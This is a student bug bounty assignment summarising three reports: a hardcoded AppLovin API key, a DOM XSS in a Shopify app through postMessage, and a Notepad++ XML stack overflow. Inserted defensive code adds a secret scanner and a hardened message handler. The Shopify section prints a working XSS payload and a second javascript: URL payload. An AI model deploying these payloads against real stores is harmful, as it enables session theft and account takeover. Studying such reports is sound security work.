Assignment 3 - Bug bounty
Sri Lanka Institute of Information Technology
Master of Science (Information Management) Degree Program
Information and Network Security
Assignment 3
Bug bounty
W.M.J.H. Fernando
MS18901290
AppLovin API Key hardcoded in a Github repo
They found Sensitive Data Exposure in the github/mopub-android-mediation project: the AppLovin UI API key is hardcoded in the source code. The main impact is that this is a production API key, so it shouldn't be shown publicly in a GitHub repo; otherwise it can be used by other developers. As it is company property and a monetized API key, it should be kept secure.
This key is used for initialization of the app, but an API key should not be disclosed publicly in a GitHub repo.
There are 2 perspective levels.
Developer perspective
Every API key has a certain usage limit, and if other developers use this same key then the usage limit left for the company is reduced.
Attacker perspective
An attacker can use this key to violate GDPR policy: from May 25th 2018 AppLovin is GDPR compliant, and there are certain rules which need to be followed while building the app, so if an attacker got this key and used it outside those rules it would violate GDPR and be a huge problem for the company. These are some links,
AppLovin GDPR policy link
1. https://www.applovin.com/privacy/
2. https://www.applovin.com/gdprfaqs/
MoPub GDPR Publisher Integration Guide
1. https://developers.mopub.com/publishers/best-practices/gdpr-guide/
As per Google AppLovin SDK Docs, EU consent and GDPR
1. https://developers.google.com/admob/android/mediation/applovin
Under the Google EU User Consent Policy, you must ensure that certain disclosures are given to, and consents obtained from, users in the European Economic Area (EEA) regarding the use of device identifiers and personal data. This policy reflects the requirements of the EU ePrivacy Directive and the General Data Protection Regulation (GDPR). When seeking consent, you must identify each ad network in your mediation chain that may collect, receive, or use personal data and provide information about each network's use. Google currently is unable to pass the user's consent choice to such networks automatically.
The best practice when committing code to a GitHub repo is to never commit your application key, because you never know when things will go wrong; the API_KEY is always company property and it should not be disclosed publicly.
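The check that would have stopped this commit, as an added example that is not the MoPub project's code: a small Node.js scanner that runs over the files about to be committed, flags an AppLovin SDK key declared in an Android manifest or as a string constant, and reports the file and line with the value redacted, next to the hardened pattern of reading the key from the build environment instead of source. The file contents, the sample key value and the `applovin.sdk.key` manifest attribute name are assumptions constructed for the demonstration.

```javascript
// Added example (not the MoPub project's code): a pre-commit scanner for
// hardcoded AppLovin SDK keys, run over constructed file contents.

// A placeholder value standing in for a leaked key; deliberately not a real key.
const SAMPLE_KEY = "A".repeat(20) + "b".repeat(20) + "0123456789";

// AppLovin SDK keys are long base64-style tokens. A length-bounded character
// class is enough for the demo; a production scanner would add an entropy test
// and a list of known placeholders to ignore (e.g. "YOUR_SDK_KEY").
const KEY_VALUE = "[A-Za-z0-9_\\-]{40,}";

const RULES = [
  {
    id: "applovin-manifest-key",
    // <meta-data android:name="applovin.sdk.key" android:value="..." />
    // (attribute name assumed from AppLovin's Android integration)
    re: new RegExp(`android:name="applovin\\.sdk\\.key"[^>]*android:value="(${KEY_VALUE})"`),
  },
  {
    id: "applovin-source-key",
    // String constants such as APPLOVIN_SDK_KEY = "..." in Java, Kotlin or Gradle
    re: new RegExp(`(?:APPLOVIN|applovin)[A-Za-z_]*(?:KEY|key)\\s*[=:]\\s*"(${KEY_VALUE})"`),
  },
];

// Never echo the full secret into CI logs; show just enough to locate it.
function redact(secret) {
  return `${secret.slice(0, 4)}...${secret.slice(-4)} (${secret.length} chars)`;
}

// Scan one file's text; returns one finding per matching rule and line.
function scanFile(path, contents) {
  const findings = [];
  contents.split("\n").forEach((text, idx) => {
    for (const rule of RULES) {
      const m = rule.re.exec(text);
      if (m) findings.push({ path, line: idx + 1, rule: rule.id, key: redact(m[1]) });
    }
  });
  return findings;
}

// Scan a map of path -> contents (stands in for the staged files of a commit).
function scanRepo(files) {
  return Object.entries(files).flatMap(([path, contents]) => scanFile(path, contents));
}

// Hardened pattern: the key is injected at build time from the environment and
// the build fails loudly if it is absent rather than shipping a placeholder.
function loadSdkKey(env = process.env) {
  const key = env.APPLOVIN_SDK_KEY;
  if (typeof key !== "string" || key.length < 40) {
    throw new Error("APPLOVIN_SDK_KEY is missing or malformed; refusing to build");
  }
  return key;
}

// Constructed repository snapshot: two files leak the key; the Gradle file
// shows the hardened form (reading it from the environment) and is not flagged.
const SAMPLE_REPO = {
  "app/src/main/AndroidManifest.xml": [
    '<manifest xmlns:android="http://schemas.android.com/apk/res/android">',
    "  <application>",
    `    <meta-data android:name="applovin.sdk.key" android:value="${SAMPLE_KEY}" />`,
    "  </application>",
    "</manifest>",
  ].join("\n"),
  "app/src/main/java/com/example/Ads.java": [
    "public final class Ads {",
    `    static final String APPLOVIN_SDK_KEY = "${SAMPLE_KEY}";`,
    "}",
  ].join("\n"),
  "app/build.gradle": [
    "android {",
    '    buildConfigField "String", "APPLOVIN_SDK_KEY", "\\"" + System.getenv("APPLOVIN_SDK_KEY") + "\\""',
    "}",
  ].join("\n"),
};

for (const f of scanRepo(SAMPLE_REPO)) {
  console.log(`${f.path}:${f.line} [${f.rule}] ${f.key}`);
}
```

Wired into a pre-commit hook or a CI job, `scanRepo` fails the commit on any finding; the key then lives only in the build environment (or a secrets manager) and reaches the app through `BuildConfig`, which is what the unflagged Gradle line sketches. A key that has already been pushed is compromised regardless of a later rewrite of history and must be rotated.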
DOM XSS via Shopify.API.remoteRedirect
This report found a DOM XSS on the apple-business-chat app, which seems to come from a vulnerable JS file. The embedded app page listens for postMessage from the window that opened it and navigates to whatever location it is sent, so an opener that sends a javascript: URL gets script execution in the app's origin. For users who have installed this app, the attacker just has to get them to use the theme code provided below to complete the XSS.
Modify the theme code to the following payload.
<script>
function attack(){
  let ctx=window.open('https://apple-business-chat-commerce.shopifycloud.com'),interval;
  let payload=btoa(`window.opener.postMessage('success',location.origin);alert(document.domain)`);
  interval=setInterval(()=>{
    ctx && ctx.postMessage({
      "message":"Shopify.API.remoteRedirect",
      "data":{
        "location":`javascript:eval(atob('${payload}'))`
      }
    },location.origin);
  },500);
  window.onmessage=(e)=>{
    e.data==="success"&&(
      console.log('attack success'),
      window.onmessage=null,
      clearInterval(interval)
    );
  };
}
attack();
</script>
<a href="javascript:attack()" style="display:block;text-align:center;width:100%;height:300px;line-height:300px;background:#000;color:#fff;">click me start attack</a>
(Screenshot in the original slides.)
Then click on the store front page to trigger the payload.
Impact
Steal session information, add administrators, etc.
Another API is also affected by XSS:
postMessage({
  "message":"Shopify.API.Bar.initialize",
  "data":{
    pagination: {
      next: {
        href: "javascript:alert(document.domain)",
        target: "new"
      },
      previous: {
        href: "javascript:alert(document.domain)",
        target: "new"
      }
    }
  }
});
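Both payloads above target the same receiving side, so the following added example (not Shopify's code) models that side once: a handler in the vulnerable shape, which navigates to, or links to, whatever `location` or `href` another window sends it, beside a hardened handler that checks the sender origin, the message shape and the target URL's scheme and host before using it. The fake `window` object, the `ALLOWED_ORIGINS` and `ALLOWED_HOSTS` lists, the `shop.example` hostnames and the handler names are assumptions made for the demonstration; the real embedded-app bridge is not on the page.

```javascript
// Added example (not Shopify's code): the receiving side of the postMessage
// bridge that the two payloads above target, in a vulnerable shape beside a
// hardened one. A minimal fake window is constructed so the code runs in Node.

// Origins allowed to drive this page, and hosts it may navigate to. Both lists
// are assumptions for the demo; a real embedded app would use its own values.
const ALLOWED_ORIGINS = new Set(["https://admin.shop.example"]);
const ALLOWED_HOSTS = new Set(["shop.example", "admin.shop.example"]);
const PAGE_BASE = "https://shop.example/";

// Stand-in for the browser window: records every navigation it is asked to do.
function makeWindow() {
  const win = { navigations: [], barLinks: null };
  win.navigate = (href) => { win.navigations.push(href); };
  return win;
}

// Vulnerable shape: any window that can reach this one can make it navigate
// to an arbitrary URL. Assigning a javascript: URL to window.location runs the
// script in this page's origin, which is the DOM XSS the report describes.
function vulnerableHandler(win, event) {
  const { message, data } = event.data || {};
  if (message === "Shopify.API.remoteRedirect") {
    win.navigate(data.location);
  } else if (message === "Shopify.API.Bar.initialize") {
    win.barLinks = { next: data.pagination.next.href, previous: data.pagination.previous.href };
  }
}

// Returns a normalised https URL on an allowed host, or null. Parsing with the
// WHATWG URL class resolves relative paths and exposes the real scheme, so
// javascript:, data:, vbscript:, blob: and scheme-relative //evil tricks all fail.
function safeRedirectTarget(raw) {
  if (typeof raw !== "string") return null;
  let url;
  try {
    url = new URL(raw, PAGE_BASE);
  } catch {
    return null;
  }
  if (url.protocol !== "https:") return null;
  if (!ALLOWED_HOSTS.has(url.hostname)) return null;
  return url.href;
}

// Hardened shape: check who is talking, what shape the message has, and where
// it points, in that order. Returns a short status so the caller can log it.
function hardenedHandler(win, event) {
  if (!ALLOWED_ORIGINS.has(event.origin)) return "rejected-origin";
  const { message, data } = event.data || {};
  if (typeof data !== "object" || data === null) return "rejected-shape";
  if (message === "Shopify.API.remoteRedirect") {
    const target = safeRedirectTarget(data.location);
    if (target === null) return "rejected-target";
    win.navigate(target);
    return "ok";
  }
  if (message === "Shopify.API.Bar.initialize") {
    const links = {};
    for (const [name, link] of Object.entries(data.pagination || {})) {
      const target = safeRedirectTarget(link && link.href);
      if (target === null) return "rejected-target";
      links[name] = target;
    }
    win.barLinks = links;
    return "ok";
  }
  return "rejected-message";
}

// Constructed events mirroring the report's payloads (the origins are invented).
const ATTACKER_REDIRECT = {
  origin: "https://attacker.example",
  data: { message: "Shopify.API.remoteRedirect", data: { location: "javascript:alert(document.domain)" } },
};
const ATTACKER_BAR = {
  origin: "https://attacker.example",
  data: {
    message: "Shopify.API.Bar.initialize",
    data: { pagination: { next: { href: "javascript:alert(document.domain)", target: "new" },
                          previous: { href: "javascript:alert(document.domain)", target: "new" } } },
  },
};
const LEGIT_REDIRECT = {
  origin: "https://admin.shop.example",
  data: { message: "Shopify.API.remoteRedirect", data: { location: "/orders?page=2" } },
};

// Run both handlers against the same events and report what each would do.
function demo() {
  const vuln = makeWindow();
  vulnerableHandler(vuln, ATTACKER_REDIRECT);
  vulnerableHandler(vuln, ATTACKER_BAR);
  const hard = makeWindow();
  return {
    vulnerableNavigations: vuln.navigations,
    vulnerableBarLinks: vuln.barLinks,
    hardenedAttackerRedirect: hardenedHandler(hard, ATTACKER_REDIRECT),
    hardenedAttackerBar: hardenedHandler(hard, ATTACKER_BAR),
    hardenedLegit: hardenedHandler(hard, LEGIT_REDIRECT),
    hardenedNavigations: hard.navigations,
  };
}

console.log(demo());
```

The origin check alone is not enough: a trusted opener can be compromised or confused, so the scheme and host allowlist in `safeRedirectTarget` is what actually removes the `javascript:` sink, and it is applied to the `Bar.initialize` pagination hrefs for the same reason. Checking `url.protocol` after parsing, rather than matching the raw string, is deliberate, since the URL parser strips leading control characters and resolves relative forms that a string prefix test would miss.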
Stack overflow in XML Parsing
Summary:
A stack buffer overflow vulnerability has been detected in the XML parsing functionality of Notepad++ v7.6.2 (32 bits).
That is due to the fact that the _invisibleEditView.getText function doesn't check buffer boundaries.
Description:
Vulnerability src file: notepad-plus-plus/PowerEditor/src/Notepad_plus.cpp
Vulnerability line: line 1008
Variable affected: char encodingStr[128];
Function that overflows buffer: _invisibleEditView.getText
Steps to Reproduce:
1. Create a .xml file with a correct XML format
2. Introduce a big XML field that overflows the "encodingStr" buffer.
3. Open the file with Notepad++ and the application should crash.
Supporting Material/References:
BoF_example1.xml -> Exploit example
Impact
An attacker could create a malicious .xml file that triggers a stack buffer overflow on the victim machine.
You only need to open the attached .xml file example with Notepad++ to reproduce the exploit.